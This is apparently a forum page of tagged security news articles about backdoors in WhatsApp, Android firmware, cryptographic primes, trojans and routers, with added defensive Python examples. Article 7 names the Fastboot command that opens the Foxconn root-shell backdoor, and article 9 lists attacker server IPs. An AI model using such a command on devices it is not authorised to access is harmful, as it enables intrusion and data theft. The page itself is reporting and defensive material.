Showing results for tags 'backdoor'.
Found 52 results

  1. Explained — What's Up With the WhatsApp 'Backdoor' Story? Feature or Bug!

     What is a backdoor? By definition: "Backdoor is a feature or defect of a computer system that allows surreptitious unauthorized access to data." The backdoor can be in an encryption algorithm, a server or an implementation, and it doesn't matter whether it has previously been used or not.

     Yesterday, we published a story based on findings reported by security researcher Tobias Boelter that suggests WhatsApp has a backdoor that "could allow" an attacker, and of course the company itself, to intercept your encrypted communication. The story involving the world's largest secure messaging platform, which has over a billion users worldwide, went viral in a few hours, attracting reactions from security experts, the WhatsApp team, and Open Whisper Systems, who partnered with Facebook to implement end-to-end encryption in WhatsApp.

     Note: I would request readers to read the complete article before reaching a conclusion. Suggestions and opinions are always invited.

     What's the Issue:
     The vulnerability relies on the way WhatsApp behaves when an end user's encryption key changes. WhatsApp, by default, trusts a new encryption key broadcast by a contact and uses it to re-encrypt undelivered messages and send them without informing the sender of the change. In my previous article, I elaborated on this vulnerability with an easy example, so you can head over to that article for a better understanding.

     Facebook itself admitted to this WhatsApp issue reported by Boelter, saying that "we were previously aware of the issue and might change it in the future, but for now it's not something we're actively working on changing."

     What Experts argued:
     According to some security experts — "It's not a backdoor, rather it's a feature to avoid unnecessary re-verification of encryption keys upon automatic regeneration."

     Open Whisper Systems says — "There is no WhatsApp backdoor," "it is how cryptography works," and the MITM attack "is endemic to public key cryptography, not just WhatsApp."

     A spokesperson from WhatsApp, acquired by Facebook in 2014 for $16 billion, says — "The Guardian's story on an alleged backdoor in WhatsApp is false. WhatsApp does not give governments a backdoor into its systems. WhatsApp would fight any government request to create a backdoor."

     What's the fact:
     Notably, none of the security experts or the company has denied the fact that, if required, WhatsApp, on government request, or state-sponsored hackers can intercept your chats. All they have to say is — WhatsApp is designed to be simple, and users should not lose access to messages sent to them when their encryption key is changed.

     Open Whisper Systems (OWS) criticized the Guardian reporting in a blog post saying, "Even though we are the creators of the encryption protocol supposedly "backdoored" by WhatsApp, we were not asked for comment."

     What? "...encryption protocol supposedly "backdoored" by WhatsApp…" NO! No one has said it's an "encryption backdoor;" instead this backdoor resides in the way end-to-end encryption has been implemented by WhatsApp, which eventually allows interception of messages without breaking the encryption. As I mentioned in my previous story, this backdoor has nothing to do with the security of the Signal encryption protocol created by Open Whisper Systems. It's one of the most secure encryption protocols if implemented correctly.

     Then Why is Signal more Secure than WhatsApp?
     You might be wondering why the Signal private messenger is more secure than WhatsApp, while both use the same end-to-end encryption protocol and are even recommended by the same group of security experts who are arguing — "WhatsApp has no backdoor." It's because there is always room for improvement. The Signal messaging app, by default, allows a sender to verify a new key before using it. Whereas WhatsApp, by default, automatically trusts the new key of the recipient with no notification to the sender. And even if the sender has turned on the security notifications, the app notifies the sender of the change only after the message is delivered. So, here WhatsApp chose usability over security and privacy.

     It's not about 'Do We Trust WhatsApp/Facebook?':
     WhatsApp says it does not give governments a "backdoor" into its systems. No doubt, the company would definitely fight the government if it receives any such court orders and currently is doing its best to protect the privacy of its one-billion-plus users. But what about state-sponsored hackers? Because, technically, there is no such 'reserved' backdoor that only the company can access.

     Why the 'Verifying Keys' Feature Can't Protect You:
     WhatsApp also offers a third security layer with which you can verify the keys of other users with whom you are communicating, either by scanning a QR code or by comparing a 60-digit number. But here's the catch: This feature ensures that no one is intercepting your messages or calls at the time you are verifying the keys, but it does not ensure that no one has intercepted your encrypted communication in the past or will intercept it in the future, and there is currently no way that would help you identify this.

     WhatsApp's Prevention against such MITM Attacks is Incomplete
     WhatsApp is already offering a "security notifications" feature that notifies users whenever a contact's security code changes, which you need to turn on manually from the app settings. But this feature is not enough to protect your communication without the use of another ultimate tool, which is — Common Sense. Have you received a notification indicating that your contact's security code has changed? Instead of offering 'Security by Design,' WhatsApp wants its users to use their common sense not to communicate with a contact whose security key has been changed recently without verifying the key manually. The fact that WhatsApp automatically changes your security key so frequently (for some reason) means that one would start ignoring such notifications, making it practically impossible for users to actively verify the authenticity of session keys each time.

     What WhatsApp should do?
     Without panicking all one-billion-plus users, WhatsApp can, at least:
       • Stop regenerating users' encryption keys so frequently (I clearly don't know why the company does so).
       • Give an option in the settings for privacy-conscious people which, if turned on, would not automatically trust a new encryption key and send messages until it is manually accepted or verified by the user.
     ...because just like others, I also hate using two apps for communicating with my friends and work colleagues, i.e. Signal for privacy and WhatsApp because everyone uses it.

     Source
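The difference the post draws between the two clients comes down to one policy decision: what an app does with queued, undelivered messages when the server announces a new key for the contact. The Python model below is an added illustration, not code from WhatsApp, Signal or the post's author; the key names, the `Conversation` structure and the two policy labels are all made up for the demonstration, and the "security code" is just a truncated SHA-256 of the key bytes standing in for the real fingerprint.

```python
import hashlib
from dataclasses import dataclass, field


def fingerprint(pubkey: bytes) -> str:
    """Short digest of a contact key, standing in for the security code a user compares."""
    return hashlib.sha256(pubkey).hexdigest()[:12]


@dataclass
class Conversation:
    """Sender-side state for one contact (constructed model, not a real client)."""
    contact_key: bytes                                  # key currently pinned for the contact
    pending: list = field(default_factory=list)         # messages queued, not yet delivered
    delivered: list = field(default_factory=list)       # (message, fingerprint of key used)
    notices: list = field(default_factory=list)         # what the sender gets to see, and when


def on_key_change(conv: Conversation, new_key: bytes, policy: str,
                  accept_new_key=lambda fp: False) -> int:
    """Handle the server announcing a new key for the contact.

    policy "auto_trust":   the default behaviour the post describes; pending messages are
                           re-encrypted to the new key and sent, and the notice (if the user
                           enabled notifications at all) is shown only after delivery.
    policy "verify_first": pending messages stay queued until the user accepts the new
                           fingerprint; nothing is encrypted to an unverified key.
    Returns the number of messages delivered so far.
    """
    fp = fingerprint(new_key)
    if policy == "auto_trust":
        conv.contact_key = new_key
        while conv.pending:                             # silent resend under the new key
            conv.delivered.append((conv.pending.pop(0), fp))
        conv.notices.append(f"security code changed to {fp} (shown after delivery)")
    elif policy == "verify_first":
        conv.notices.append(f"security code changed to {fp}; {len(conv.pending)} message(s) held")
        if accept_new_key(fp):                          # only an explicit decision unblocks the queue
            conv.contact_key = new_key
            while conv.pending:
                conv.delivered.append((conv.pending.pop(0), fp))
    else:
        raise ValueError(f"unknown policy {policy!r}")
    return len(conv.delivered)


if __name__ == "__main__":
    old_key, new_key = b"contact-key-v1", b"contact-key-v2"   # constructed placeholder keys
    for policy in ("auto_trust", "verify_first"):
        conv = Conversation(contact_key=old_key, pending=["hello", "meet at 9"])
        on_key_change(conv, new_key, policy)
        print(policy, "delivered:", conv.delivered, "held:", conv.pending)
        print("  notices:", conv.notices)
```

Under `auto_trust` every queued message is encrypted to whoever presented the new key before the sender learns anything; under `verify_first` the queue stays put and the sender's decision gates delivery, which is the "option in the settings" the post asks for.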
  2. WhatsApp Security: Make This Change Right Now!

     Security researchers found a backdoor in the popular messaging application WhatsApp recently that could allow WhatsApp to intercept and read user messages. Facebook, the owner of WhatsApp, claims that it is impossible to intercept messages on WhatsApp thanks to the service's end-to-end encryption. The company states that no one, not even itself, can read what is sent when both sender and recipient use the latest version of the application.

     It turns out however that there is a way for WhatsApp to read user messages, as security researcher Tobias Boelter (via The Guardian) found out.

     Update: In a statement sent to Ghacks, a WhatsApp spokesperson provided the following insight on the claim:

     WhatsApp has the power to generate new encryption keys for users who are not online. Both the sender and the recipient of messages are not made aware of that, and the sender would send any message not yet delivered again using the new encryption key to protect the messages from third-party access. The recipient of the message is not made aware of that; the sender only if WhatsApp is configured to display security notifications. This option is however not enabled by default.

     While WhatsApp users cannot block the company -- or any state actors requesting data -- from taking advantage of the loophole, they can at least activate security notifications in the application.

     The security researcher reported the vulnerability to Facebook in April 2016 according to The Guardian. Facebook's response was that it was "intended behavior" according to the newspaper.

     Activate security notifications in WhatsApp
     To enable security notifications in WhatsApp, do the following:
       1. Open WhatsApp on the device you are using.
       2. Tap on menu, and select Settings.
       3. Select Account on the Settings page.
       4. Select Security on the page that opens.
       5. Enable "show security notifications" on the Security page.

     You will receive notifications when a contact's security code has changed. While this won't prevent misuse of the backdoor, it will at least inform you about its potential use.

     Source
     Alternate Source - 1: WhatsApp Encryption Has Backdoor, Facebook Says It's "Expected Behaviour"
     Alternate Source - 2: WhatsApp Backdoor allows Hackers to Intercept and Read Your Encrypted Messages
     Alternate Source - 3: Oh, for F...acebook: Critics bash WhatsApp encryption 'backdoor'
     Alternate Source - 4: Your encrypted WhatsApp messages can be read by anyone
     Alternate Source - 5: How to protect yourself from the WhatsApp 'backdoor'
     Alternate Source - 6: 'Backdoor' in WhatsApp's end-to-end encryption leaves messages open to interception [Updated]
     Detailed Explanation of the Issue and Prevention/Alternatives:
  3. Website spreading Gatak-infected keygens (via Symantec)

     Websites offering free keygens for various enterprise software applications are helping crooks spread the Gatak malware, which opens backdoors on infected computers and facilitates attacks on a company's internal network, or the theft of sensitive information.

     Gatak is a backdoor trojan that first appeared in 2012. Another name for this threat is Stegoloader, and its main distinctive feature is its ability to communicate with its C&C servers via steganography.

     [Image: Gatak relies on steganography to stay hidden]

     Steganography is the technique of hiding data in plain sight. In the world of cyber-security, steganography is the practice of hiding malicious code, commands, or malware configuration data inside PNG or JPG images. The malware, in this case Gatak, connects to its online C&C server and requests new commands. Instead of receiving an HTTP network request, for which all security software knows to be on the lookout, the data is sent as an innocuous image, which looks like regular web traffic. The malware reads the image's hidden data and executes the command, all while the local antivirus thinks the user has downloaded an image off the Internet.

     Keygens for enterprise software spreading Gatak
     Security firm Symantec says it uncovered a malware distribution campaign that leverages a website offering free keygens for various applications such as:
       • SketchList3D - woodworking design software
       • Native Instruments Drumlab - sound engineering software
       • BobCAD-CAM - metalworking/manufacturing software
       • BarTender Enterprise Automation - label and barcode creation software
       • HDClone - hard disk cloning utility
       • Siemens SIMATIC STEP 7 - industrial automation software
       • CadSoft Eagle Professional - printed circuit board design software
       • PremiumSoft Navicat Premium - database administration software
       • Originlab Originpro - data analysis and graphing software
       • Manctl Skanect - 3D scanning software
       • Symantec System Recovery - backup and data recovery software

     All of the above are specialized apps, deployed in enterprise environments. The group behind this campaign is specifically targeting users that use these applications at work, but without valid licenses, in the hope of infecting valuable targets they could hack, steal data from, and possibly sell it on the underground.

     Keygens don't work, they just infect users with Gatak
     The keygens distributed via this website aren't even fully working tools. They just produce a random string of characters, but their purpose is to trick the user into executing the keygen binary just once, enough to infect the victim.

     The hackers are picky about the companies they target because the security firm has seen second-stage attacks on only 62% of all infected computers. Attackers use Gatak to gather basic information about targets, on which, if they deem them valuable, they deploy other malware at later stages. In some cases, the hackers also resort to lateral movement on the victim's network, with the attackers manually logging into the compromised PC. Attacks aren't sophisticated, and the hackers only take advantage of weak passwords inside the local network. Symantec says it didn't detect any zero-days or automated hacking tools employed when hackers have attempted to infect other devices on the local network.

     [Image: Gatak infections per industry vertical (via Symantec)]

     Telemetry data shows that 62% of all Gatak infections have been found on computers on enterprise networks. Most of these attacks have targeted the healthcare sector, but it doesn't appear that hackers specifically targeted this industry vertical, as other companies in other verticals were also hit. Attackers might have opted to focus more on healthcare institutions because these organizations usually store more in-depth user data they can steal, compared to the automotive industry, gambling, education, construction, or others.

     "In some cases, the attackers have infected computers with other malware, including various ransomware variants and the Shylock financial Trojan," Symantec notes in a report. "They may be used by the group when they believe their attack has been uncovered, in order to throw investigators off the scent."

     Article source
  4. Seriously, you cannot trust anyone these days

     SECURITY COMPANY Proofpoint has discovered that some bastard blaggards are using the medium of YouTube to sell phishing software to people, and then exploiting those people. It makes you wonder if you can trust anyone these days. If you cannot trust someone who sells something that is designed to steal from people not to steal from you, who can you trust not to steal from you?

     In the short term, let's assume that we can trust Proofpoint. Proofpoint is pretty upset about its discovery and disappointed to see old hacking techniques making their way onto cats-jumping-onto-things and monkeys-sniffing-things site YouTube. We guess we should all share its disappointment. Even those of us that have neither sought nor bought a phishing kit on the internet.

     "Like most other businesses, cybercriminals look for ways to market and distribute their tools effectively while staying under the radar of law enforcement and the security community. Recently, Proofpoint researchers have observed scammers distributing phishing templates and kits via YouTube, complete with how-to videos and links in the video descriptions to the software. In fact, this practice appears to be quite widespread. A simple search for "paypal scama" returns over 114,000 results," said the firm.

     "There's a catch, though, for criminals downloading the software: a backdoor sends the phished information back to the author. While backdoors on these templates aren't new, the use of YouTube to advertise and distribute them is a new trend."

     It is not that new though; Proofpoint says that some of the videos have been on YouTube for a few months now, and that this suggests that YouTube does not have anything that automatically scans for this kind of caper. The last laugh is on the original poster because ultimately everything comes back to him, or her. The victims are the victims that have fallen foul of schemes to rob them via Amazon and eBay and other online merchants. Obviously.

     "Many of the video samples we found on YouTube have been posted for months, suggesting that YouTube does not have an automated mechanism for detection and removal of these types of videos and links. They remain a free, easy-to-use method for the authors of phishing kits and templates to advertise, demonstrate, and distribute their software," concludes Proofpoint.

     "At the same time, the old adage of 'honor among thieves' should be taken with a grain of salt, since multiple samples revealed authors including backdoors to harvest phished credentials even after new phishing actors purchased the templates for use in their own campaigns. The real losers in these transactions, though, are the victims who have their credentials stolen by multiple actors every time the kits are used."

     Article source
  5. In "mistake," AdUps collected data from BLU Android phones in US.

     [Image: The BLU R1 HD is one of the devices that was backdoored by a Chinese software provider.]

     Security firm Kryptowire has uncovered a backdoor in the firmware installed on low-cost Android phones, including phones from BLU Products sold online through Amazon and Best Buy. The backdoor software, initially discovered on the BLU R1 HD, sent massive amounts of personal data about the phones and their users' activities back to servers in China that are owned by a firmware update software provider. The data included phone number, location data, the content of text messages, calls made, and applications installed and used.

     The company, Shanghai AdUps Technologies, had apparently designed the backdoor to help Chinese phone manufacturers and carriers track the behavior of their customers for advertising purposes. AdUps claims its software runs updates for more than 700 million devices worldwide, including smartphones, tablets, and automobile entertainment systems. It is installed on smartphones from Huawei and ZTE sold in China. The surveillance feature of the software was developed specifically for the Chinese market, the company says, and was unintentionally included in the software for BLU devices. A lawyer for the company told The New York Times that the data was not being collected for the Chinese government, stating, "This is a private company that made a mistake."

     The backdoor was part of the commercial Firmware Over The Air (FOTA) update software installed on BLU Android devices, provided as a service to BLU by AdUps. In a report on the finding, a Kryptowire spokesperson said:

       These devices actively transmitted user and device information including the full body of text messages, contact lists, call history with full telephone numbers, unique device identifiers including the International Mobile Subscriber Identity (IMSI) and the International Mobile Equipment Identity (IMEI). The firmware could target specific users and text messages matching remotely defined keywords. The firmware also collected and transmitted information about the use of applications installed on the monitored device, bypassed the Android permission model, executed remote commands with escalated (system) privileges, and was able to remotely reprogram the devices... The firmware that shipped with the mobile devices and subsequent updates allowed for the remote installation of applications without the users' consent and, in some versions of the software, the transmission of fine-grained device location information.

     The transmissions were discovered by Kryptowire in lab testing. The company immediately notified Google, BLU, AdUps, and Amazon, which is the exclusive retailer of the BLU R1 HD, of its findings. The user data was sent in JavaScript Object Notation (JSON) format to a number of servers, all with the hostname bigdata: bigdata.adups.com, bigdata.adsunflower.com, bigdata.adfuture.cn, and bigdata.advmob.cn.

     The data collection and transmission capability is spread across different applications and files. Text message data (encrypted with DES, for which Kryptowire researchers were able to recover the key) and call log information were sent back every 72 hours. Other data, including location data and app use, was sent every 24 hours.

     A BLU spokesperson told Ars that the software backdoor affected a "limited number of BLU devices" and that the "affected application has since been self-updated and the functionality verified to be no longer collecting or sending this information." According to The New York Times report, BLU reported about 120,000 devices were affected and patched.

     Article source
  6. Microsoft Corp, still stung by accusations that it installed "back doors" for the U.S. government to access customers' communications, opened a center in Brazil on Wednesday where officials will be able to inspect its programming code, in an attempt to allay suspicions in the region that its software programs are vulnerable to spying.

     Behind reinforced walls and with strict security settings, the world's biggest software company showed off its fourth 'Transparency Center' in Brasilia, where experts from Latin American and Caribbean governments will be able to view the source code of its products.

     The effort to build trust follows heightened suspicions in the region after former U.S. National Security Agency contractor Edward Snowden leaked documents in 2013 that showed the agency was capturing massive amounts of data from emails handled by major U.S. technology companies, including Microsoft. The leak, in addition to another Snowden disclosure that the United States had been spying on communications including those of former Brazilian President Dilma Rousseff, prompted Brazil and other governments around the world to reconsider how much they could trust U.S. technology companies not to install back doors at the request of U.S. intelligence agencies.

     At the new site, visited on Wednesday by officials including the speaker of Brazil's Congress, no electronics will be allowed into the secure viewing room. Microsoft prevents anyone from copying the massive amount of coding on display - as much as 50 million lines for its email and server products. Viewers inspect copies of source code on computers connected only to local servers and cut off from the internet. The copies are later deleted. Viewers can use software tools to examine the code, Microsoft said, but it was not immediately clear whether experts would be able to run the deep code analysis necessary to uncover back doors or other bugs.

     It is by no means certain the effort by Microsoft will diminish concerns about spying, but Brazil's reaction to the generally secretive software company opening up its code was initially positive. "This center is aimed at showing that there are no traps, it is a good step," a Brazilian government official, who asked not to be named because he was not authorized to speak about cyber security, told Reuters.

     The Brasilia facility is Microsoft's fourth transparency center after the NSA scandal. It set up the first one at its Redmond, Washington headquarters in the United States in 2014, one in Brussels last year and one in Singapore earlier this month. It will soon open another in Beijing. The centers allow for face-to-face discussions between government experts and developers. "Governments can verify for themselves that there are no back doors," said Mark Estberg, senior director of Microsoft's global government security program.

     Article source
  7. Pork Explosion backdoor affects Foxconn-made devices

     Some Android devices that contain firmware created by Foxconn may be vulnerable via a debugging feature left inside the OS bootloader, which acts as a backdoor and bypasses authentication procedures for any intruder with USB access to a vulnerable phone. Foxconn is a Taiwanese company that assembles the electronic parts of several Android smartphone manufacturers (OEMs). The reason this backdoor exists in the bootloader, the piece of code responsible for booting up the Android OS, is because various OEMs allow Foxconn to create and supply firmware for some of the electronics they use to glue all the parts of an Android device together.

     Foxconn debugging feature acts as a backdoor
     Jon Sawyer, a US security expert, discovered at the end of August that this firmware included support for booting up Android devices without having to go through the proper authentication procedure. The researcher says that someone with physical access to the device could connect it via USB to a computer, and use specific software to interact with the device during its boot-up procedure. This kind of software is most likely a Foxconn debugger, but Sawyer was able to craft his own client and run the commands to enter this "factory test mode."

     This test mode (aka backdoor) can be accessed via Fastboot, a protocol for handling boot-up commands. Sawyer says that the boot-up command to access the backdoor is "reboot-ftm," and can only be sent to the device using custom software, and not through Android or OEM-specific Fastboot interfaces. "While it is obviously a debugging feature, it is a backdoor," Sawyer says, "it isn't something we should see in modern devices, and it is a sign of great neglect on Foxconn's part."

     Backdoor accessible via USB, disables SELinux
     But it gets even worse. When entering this factory test mode, Sawyer says the user is "root," with total control over the phone, and that SELinux, a major Android security component, is completely disabled. "In short, this is a full compromise over usb, which requires no logon access to the device," Sawyer says. "This vulnerability completely bypasses authentication and authorization controls on the device. It is a prime target for forensic data extraction."

     "Due to the ability to get a root shell on a password protected or encrypted device, Pork Explosion would be of value for forensic data extraction, brute forcing encryption keys, or unlocking the boot loader of a device without resetting user data. Phone vendors were unaware this backdoor has been placed into their products," Sawyer adds.

     Unknown number of devices affected
     This backdoor, which he (weirdly) named Pork Explosion, affects a large number of devices. Unfortunately, there isn't a list of affected OEMs and smartphone models at the time of writing. Sawyer has provided the following information on how to detect Android devices affected by Pork Explosion.

     Source: http://news.softpedia.com/news/backdoor-discovered-in-some-foxconn-made-android-smartphones-509271.shtml#sgal_0
  8. Researchers warn about the use of standardized or hard-coded primes in existing cryptosystems

     Researchers warn that many 1024-bit keys used to secure communications on the internet today might be based on prime numbers that have been intentionally backdoored in an undetectable way.

     Many public-key cryptography algorithms that are used to secure web, email, VPN, SSH and other types of connections on the internet derive their strength from the mathematical complexity of discrete logarithms -- computing discrete logarithms for groups of large prime numbers cannot be efficiently done using classical methods. This is what makes cracking strong encryption computationally impractical.

     Most key-generation algorithms rely on prime parameters whose generation is supposed to be verifiably random. However, many parameters have been standardized and are being used in popular crypto algorithms like Diffie-Hellman and DSA without the seeds that were used to generate them ever being published. That makes it impossible to tell whether, for example, the primes were intentionally "backdoored" -- selected to simplify the computation that would normally be required to crack the encryption.

     Researchers from the University of Pennsylvania, INRIA, CNRS and Université de Lorraine recently published a paper in which they show why this lack of cryptographic transparency is problematic and could mean that many encryption keys used today are based on backdoored primes without anyone -- aside from those who created them -- knowing. To demonstrate this, the researchers created a backdoored 1024-bit Diffie-Hellman prime and showed that solving the discrete log problem for it is several orders of magnitude easier than for a truly random one.

     "Current estimates for 1024-bit discrete log in general suggest that such computations are likely within range for an adversary who can afford hundreds of millions of dollars of special-purpose hardware," the researchers said in their paper. "In contrast, we were able to perform a discrete log computation on a specially trapdoored prime in two months on an academic cluster."

     The problem is that for someone who doesn't know about the backdoor, demonstrating that a prime has been trapdoored in the first place would be nearly impossible. "The near universal failure of implementers to use verifiable prime generation practices means that use of weak primes would be undetectable in practice and unlikely to raise eyebrows."

     This is conceptually similar to the backdoor found in the Dual_EC random number generator, which is believed to have been introduced by the U.S. National Security Agency. However, that backdoor was much easier to find and, unlike Diffie-Hellman or DSA, Dual_EC never received widespread adoption.

     Diffie-Hellman ephemeral (DHE) is slowly replacing RSA as the preferred key exchange algorithm in TLS due to its perfect forward secrecy property that's supposed to keep past communications secure even if the key is compromised in the future. However, the use of backdoored primes would defeat that security benefit. Furthermore, 1024-bit keys are still widely used online, despite the U.S. National Institute of Standards and Technology recommending a transition to larger key sizes since 2010. According to the SSL Pulse project, 22 percent of the internet's top 140,000 HTTPS-enabled websites use 1024-bit keys.

     "Our results are yet another reminder that 1024-bit primes should be considered insecure for the security of cryptosystems based on the hardness of discrete logarithms," the researchers said. "The discrete logarithm computation for our backdoored prime was only feasible because of the 1024-bit size, and the most effective protection against any backdoor of this type has always been to use key sizes for which any computation is infeasible."

     The researchers estimate that performing similar computations for 2048-bit keys, even with backdoored primes, would be 16 million times harder than for 1024-bit keys and will remain infeasible for many years to come. The immediate solution is to switch to 2048-bit keys, but in the future all standardized primes should be published together with their seeds, the researchers said.

     Documents leaked in 2013 by former NSA contractor Edward Snowden suggested that the agency has the ability to decrypt a lot of VPN traffic. Last year, a group of researchers speculated that the reason for this was the widespread use in practice of a small number of fixed or standardized groups of primes. "Performing precomputation for a single 1024-bit group would allow passive eavesdropping on 18% of popular HTTPS sites, and a second group would allow decryption of traffic to 66% of IPsec VPNs and 26% of SSH servers," the researchers said in their paper at that time. "A close reading of published NSA leaks shows that the agency's attacks on VPNs are consistent with having achieved such a break."

     Article source
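The remedy the article ends on, publishing every standardized prime together with the seed it was derived from, only helps if a third party can actually re-run the derivation. The Python below is an added illustration of that idea and is not code from the paper, from any standard, or from this post; it is a deliberately simplified scheme in the spirit of verifiable (seed-driven) prime generation, not the exact FIPS 186 procedure, and the seed, the 128-bit size used in the demo and the function names are all constructed for the example (real DH groups are 2048 bits or more, as the article says). The point it shows is that a verifier checks two things: that the prime really falls out of SHA-256(seed, counter), and that no earlier counter already yielded an acceptable prime, so the generator had no room to shop around for a weak one.

```python
import hashlib

# Miller-Rabin bases: deterministic for n < 3.3e24, a strong probabilistic test beyond that.
MR_BASES = [2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37]


def is_probable_prime(n: int) -> bool:
    """Trial division by the small bases, then Miller-Rabin."""
    if n < 2:
        return False
    for p in MR_BASES:
        if n % p == 0:
            return n == p
    d, r = n - 1, 0
    while d % 2 == 0:
        d //= 2
        r += 1
    for a in MR_BASES:
        x = pow(a, d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False          # a is a witness that n is composite
    return True


def candidate_from_seed(seed: bytes, bits: int, counter: int) -> int:
    """Derive a candidate deterministically: SHA-256(seed || counter || i) expanded to `bits` bits."""
    out = b""
    i = 0
    while len(out) * 8 < bits:
        out += hashlib.sha256(seed + counter.to_bytes(4, "big") + i.to_bytes(4, "big")).digest()
        i += 1
    x = int.from_bytes(out, "big") >> (len(out) * 8 - bits)
    return x | (1 << (bits - 1)) | 1          # force exact bit length and oddness


def acceptable(p: int, safe: bool) -> bool:
    """A plain prime, or (for DH use) a safe prime p = 2q + 1 with q prime."""
    return is_probable_prime(p) and (not safe or is_probable_prime((p - 1) // 2))


def generate_verifiable_prime(seed: bytes, bits: int, safe: bool = True, max_counter: int = 200_000):
    """Walk counters from 0 and take the FIRST acceptable candidate; publish (p, counter) with the seed."""
    for counter in range(max_counter):
        p = candidate_from_seed(seed, bits, counter)
        if acceptable(p, safe):
            return p, counter
    raise RuntimeError("no acceptable prime found; use another seed or raise max_counter")


def verify_published_prime(seed: bytes, bits: int, counter: int, p: int, safe: bool = True) -> bool:
    """What a third party runs on (seed, counter, p) before trusting a standardized prime."""
    # 1. p must be exactly what the seed and counter produce, and must pass the primality checks
    if candidate_from_seed(seed, bits, counter) != p or not acceptable(p, safe):
        return False
    # 2. no earlier counter may already have produced an acceptable prime; otherwise the
    #    generator skipped valid candidates, which is exactly the freedom a trapdoor needs
    return not any(acceptable(candidate_from_seed(seed, bits, c), safe) for c in range(counter))


if __name__ == "__main__":
    SEED = b"constructed-demo-seed"            # a real standard would publish its actual seed
    p, counter = generate_verifiable_prime(SEED, 128)
    print(f"p = {p:#x}\ncounter = {counter}")
    print("verifies:", verify_published_prime(SEED, 128, counter, p))
    print("tampered p verifies:", verify_published_prime(SEED, 128, counter, p + 4))
```

With the seed withheld, as the article says is the case for many standardized groups, a verifier can run only the primality checks, which say nothing about how the prime was chosen; with the seed published, step 2 pins the choice down completely.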
  9. Trojan steals app and database passwords, PoS data

Log of recent attacks against the RDP port of a honeypot server

A new malware family called Trojan.sysscan has the potential to wreak havoc in enterprise networks that feature poorly protected RDP servers. Discovered by security firm Guardicore, the malware is used by attackers as a backdoor trojan, collecting data from compromised hosts and exfiltrating it to an attacker-controlled remote server.

Attacker infects systems after RDP brute-force attacks

Targeted systems are infected after the attacker scans the Internet for open RDP ports, which he then brute-forces using common username and password combinations. Poorly secured servers are the optimal targets, and because RDP servers are commonly found in medium-to-large enterprise networks, companies have the most to fear from this new threat.

According to Guardicore, the trojan is written in Delphi and comes with support for dumping passwords from locally installed applications such as browsers, databases, and PoS software. It contains specific functions to target credentials for accounts on banking, gambling and tax websites, and it also steals browser cookie files.

Two IP addresses used in recent attacks

The trojan sets up a hidden administrator account on compromised systems in order to gain boot persistence and makes sure to leave RDP open for future connections. Guardicore says Trojan.sysscan contains code to detect when it is executed in sandbox environments and virtual machines. Nevertheless, the trojan only detects the presence of these environments and takes no action to stop execution or hide its activity.

The data the trojan collects is sent via an unencrypted HTTP request to a remote server. If the transfer fails, the attacker often logs in via RDP and copies the data manually.
Security experts say that during this recent wave of Trojan.sysscan attacks, the threat actor behind the malware has used two IPs: 85.93.5.43 (UAE) to store the stolen data, and 144.76.137.166 (Germany) to scan for open RDP ports. Article source
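Because Trojan.sysscan gets in through RDP password guessing, the earliest detection opportunity is the burst of failed logons that precedes the successful one. The Python below is an added example, not part of the article or of Guardicore's research: it runs over a constructed honeypot-style log (the line format, timestamps and the 203.0.113.x / 198.51.100.x addresses are invented for the demo), flags a source once it passes a failure threshold inside a sliding window, and then flags any later successful logon from that source as a probable compromise. On a real Windows host the same signal lives in Security log events 4625 (failure) and 4624 (success) with logon type 10.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed honeypot log, not real capture data.
SAMPLE_LOG = """\
2016-10-03T11:02:15Z rdp login_failed src=203.0.113.7 user=administrator
2016-10-03T11:02:16Z rdp login_failed src=203.0.113.7 user=admin
2016-10-03T11:02:17Z rdp login_failed src=203.0.113.7 user=Administrator
2016-10-03T11:02:18Z rdp login_failed src=198.51.100.9 user=jsmith
2016-10-03T11:02:19Z rdp login_failed src=203.0.113.7 user=user
2016-10-03T11:02:20Z rdp login_failed src=203.0.113.7 user=test
2016-10-03T11:02:21Z rdp login_failed src=203.0.113.7 user=administrator
2016-10-03T11:05:30Z rdp login_ok src=203.0.113.7 user=administrator
2016-10-03T11:06:00Z rdp login_ok src=198.51.100.9 user=jsmith
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) rdp (?P<event>login_failed|login_ok) "
    r"src=(?P<src>[\d.]+) user=(?P<user>\S+)$")


def detect_rdp_bruteforce(lines, threshold=5, window=timedelta(minutes=2)):
    """Sliding-window count of failed logons per source address.

    A source is flagged once it reaches `threshold` failures inside `window`;
    a later successful logon from a flagged source is reported separately,
    because that is the moment an account has most likely been guessed."""
    recent = defaultdict(deque)      # src -> deque of (timestamp, username)
    flagged = set()
    alerts = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue                 # ignore lines that are not RDP logon events
        ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ")
        src, user, event = m["src"], m["user"], m["event"]
        if event == "login_failed":
            q = recent[src]
            q.append((ts, user))
            while q and ts - q[0][0] > window:   # drop failures outside the window
                q.popleft()
            if len(q) >= threshold and src not in flagged:
                flagged.add(src)
                alerts.append({"kind": "bruteforce", "src": src,
                               "failures": len(q),
                               "users": sorted({u for _, u in q})})
        elif src in flagged:         # login_ok after a brute-force run
            alerts.append({"kind": "success_after_bruteforce", "src": src,
                           "user": user, "at": ts.isoformat()})
    return alerts


if __name__ == "__main__":
    for alert in detect_rdp_bruteforce(SAMPLE_LOG.splitlines()):
        print(alert)
```

The single failure from 198.51.100.9 followed by a successful logon never trips the threshold, so only the 203.0.113.7 run produces alerts; the list of usernames tried is kept in the alert because a spread of generic names (administrator, admin, test) is itself a strong brute-force indicator.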
  10. Security researcher Pierre Kim has unearthed a bucketload of vulnerabilities affecting the LTE router/portable wireless hotspot D-Link DWR-932. Among these are backdoor accounts, weak default PINs, and hardcoded passwords.

Kim went searching for them after he had previously poked around some Quanta LTE routers and found a huge number of flaws, and a D-Link DWR-932 user noted that the two router types have many similarities. In fact, he says that D-Link's router is based on the Quanta models and inherited some of the vulnerabilities.

The documented D-Link DWR-932 vulnerabilities affect the latest available firmware. Kim first responsibly disclosed them to the D-Link Security Incident Response Team in June, but after the company said early this month that it doesn't have a schedule for a firmware release, he decided to go public with the details about some of the flaws.

In short, the firmware sports:

Two backdoor accounts with easy-to-guess passwords that can be used to bypass the HTTP authentication used to manage the router
